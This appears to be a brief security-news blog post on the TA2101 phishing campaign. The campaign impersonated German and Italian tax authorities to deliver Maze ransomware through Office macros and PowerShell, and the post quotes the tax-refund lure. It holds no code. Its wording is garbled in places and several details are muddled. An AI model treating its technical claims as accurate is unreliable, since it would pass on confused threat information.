TA2101 Exploiting Windows Using MS Office


Recently a group of researchers detected a new malware campaign – TA2101 that are targetting German & Italian companies to deploy and install the malware in their network.

The actor started impersonating as Bundeszentralamt fur Steuern, the current German Federal Ministry of Finance with look-alike domain, header & stolen branding in email. These groups used a licensed penetrating tool and framework such as cobalt strike and Metasploit to perform post-exploitation tasks. These kinds of tools and frameworks are used by an organization to find the vulnerabilities within the targetted network, despite it is also used as a simulation tool to penetrate the network. Various actors had deployed and executed various malware including Cobalt, APT 32 & 19.

Researchers had also observed that this malware actor distributed the famous maze ransomware by employing the same social engineering techniques while targetting the Italian revenue agency Agenzia delle entrate.

This year between 16 October & 12 November researchers observed the actor is sending malicious emails to the government, IT, manufacturing & healthcare officials in Germany and Italy.

The same year on 16th October 2019, 100 of emails attempting to deliver across malicious using Microsoft of documents attached malware impersonating Bundeszentralamt fur Steuern, using attractive coated messages.

The attractive coated message contains “2019 tax refund is remaining of 694,32 Euros and the recipient should apply for tax-refund using an attached Microsoft document within 3 days”

Once the attached Microsoft document is opened, it executes a macro and executes a Powershell script that downloads and installs Maze ransomware on to the victim system.

The same year on October 29 an impersonate email sent to the financial department of Italy.

These emails used by .icu domain as well as the identical email address for the SOA.

Masked email used for German officials: [email protected]

Masked email used for Italian Officials: [email protected]

“Financial related impersonations used – using fishing emails, campaigns, drama in different geographical locations “

Leave a Reply

Your email address will not be published.